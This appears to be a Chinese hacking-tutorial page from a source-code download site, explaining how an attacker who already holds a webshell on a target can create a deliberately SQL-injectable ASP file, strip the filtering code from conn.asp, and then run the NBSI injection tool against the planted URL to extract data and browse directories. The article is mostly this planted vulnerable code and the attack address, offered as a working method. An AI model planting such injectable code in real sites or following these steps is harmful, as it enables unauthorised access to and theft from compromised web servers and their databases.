首 页 ┆ 源码下载 ┆ IT学院 ┆ 字体下载 ┆ 模板下载 ┆ 源码发布 ┆ 广告合作 ┆ 网站地图 ┆ 虚拟主机 ┆ 中文域名
► 设为首页
► 加入收藏
► 联系我们
源码下载 >> ASP源码 | PHP源码 | ASP.net源码 | JSP源码 | CGI源码 | VC/C++源码 | VB源码 | Delphi源码 | Flash源码
文章学院 >> 网络编程 | 网页设计 | 图形图象 | 数据库 | 服务器 | 网络媒体 | 网络安全 | 操作系统 | 办公软件 | 软件开发 | 黑客知识
字体下载 >> 精制字体 | 非英字体 | 艺术字体 | 著名字体 | 哥特式 | 简单字体 | 手写体 | 节假日 | 图案字体 | 精度像素 | 中文字体
模板下载 >> 企业门户 | 数码网络 | 休闲娱乐 | 影视音乐 | 旅游名胜 | 文化艺术 | 电子商务 | 个性展示 | 登陆导航 | Flash模板
►►您当前的位置:源码园 → IT学院 → 黑客知识 → 黑客进阶 → 文章内容

在webshell基础上伪造SQL注入点--webshell,基础上,伪造,SQL,注入点

作者:佚名  来源:网上收集  发布时间:2006-6-22 23:12:26
    有webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中.   
在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如下:   
<!--#include file="conn.asp"-->   
<%   
dim rs,strSQL,id   
set rs=server.createobject("ADODB.recordset")   
id = request("id")   
strSQL = "select * from admin where id=" & id ’如果没有这个admin表,可以自己建立一个表和字段   
rs.open strSQL,conn,1,3   
rs.close   
%>   

然后输入:http://目标IP/a.asp?id=1   
完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦,慢慢的浏览着他的目录.
  
[] [返回上一页] [打 印]
  • 上一篇文章:学软件破解最基本的6个概念--软件破解,基本,6个概念
  • 下一篇文章:推荐:ASP网站漏洞解析及黑客入侵防范方法--推荐,ASP,网站,漏洞,解析,黑客,入侵,防范,方法

  • 相关文章:
  • 在web上如何自动安装用户证书及根证书
  • 在Web Service中使用ASP.net状态保持(6)
  • 在Web Service中使用ASP.net状态保持(5)
  • 在Web Service中使用ASP.net状态保持(4)
  • 在Web Service中使用ASP.net状态保持(3)
  • 在Web Service中使用ASP.net状态保持(2)
  • 在Web Service中使用ASP.net状态保持(1)
  • 在webshell基础上伪造SQL注入点--webshell,基础上,伪...
  • 如何伪造SQL注入点?(发现)--伪造,SQL,注入点
  • [图文]从挖掘“站长之家”注入点到搞定WebShell一路...
  • [组图]在WEB程序中隐藏后门--WEB,程序,隐藏后门
  • 如何伪造SQL注入点?--伪造,SQL,注入点,注入
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 源码发布
Copyright © 2003-2009 Ymyasp.Com. All Rights Reserved .
备案序号:粤ICP备07029071号